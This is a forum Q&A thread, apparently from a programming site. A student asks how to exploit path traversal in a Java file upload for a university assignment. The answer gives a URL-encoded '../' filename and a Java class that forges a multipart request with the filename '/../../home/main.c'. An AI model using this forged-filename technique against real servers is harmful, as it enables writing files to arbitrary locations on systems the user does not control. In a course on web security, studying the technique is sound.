# Path traversal, file upload exploit

Tags: java, security, web

I have a University assignment where I have to upload a file to arbitrary locations. From the code I can see that the uploaded file is being stored in the temporary folder of the unix system + the file name. This means if i can send the server (java) the filename as /../../home/main.c I could store the file on any location on the system.

Its impossible to insert a forward-slash character as part of a file name which excludes this option, so the only way would be to trick the web client somehow sending manually the name of the file.

Is this possible and how?

```
File f = new File (dir,entry.getname());
```

where "dir" is /temp

Answer (score 1):

you can name the file something like `%2F%2E%2E%2F%2E%2E%2Fhome%2Fmain%2Ec` and upload using a browser, but i doubt it will work.

you can also try to forge your multipart/form-data http post request hacking an existing implementation, something like this (using commons-httpClient 3.1):

```
public class Forgery
{
    public static void main(String[] args)
    {
        File f = new File("/path/fileToUpload.txt");
        PostMethod filePost = new PostMethod("http://host/some_path");
        Part[] parts = 
        { 
            new StringPart("param_name", "value"), 
            new FilePart(f.getName(), f)
            {
                private static final byte[] FILE_NAME_BYTES = EncodingUtil.getAsciiBytes(FILE_NAME);

                @Override
                protected void sendDispositionHeader(OutputStream out) throws IOException
                {
                    out.write(CONTENT_DISPOSITION_BYTES);
                    out.write(QUOTE_BYTES);
                    out.write(EncodingUtil.getAsciiBytes(getName()));
                    out.write(QUOTE_BYTES);
                    out.write(FILE_NAME_BYTES);
                    out.write(QUOTE_BYTES);
                    out.write(EncodingUtil.getAsciiBytes("/../../home/main.c"));
                    out.write(QUOTE_BYTES);
                }
            } 
        };
        filePost.setRequestEntity(new MultipartRequestEntity(parts, filePost.getParams()));
        HttpClient client = new HttpClient();
        int status = client.executeMethod(filePost);
    }
}
```

Comment: Looks interesting, but I don't have a clue where to execute this? I have just a upload file (via File Explorer) field and submit button.

Comment: It is too big and complex...I don't understand it my self too much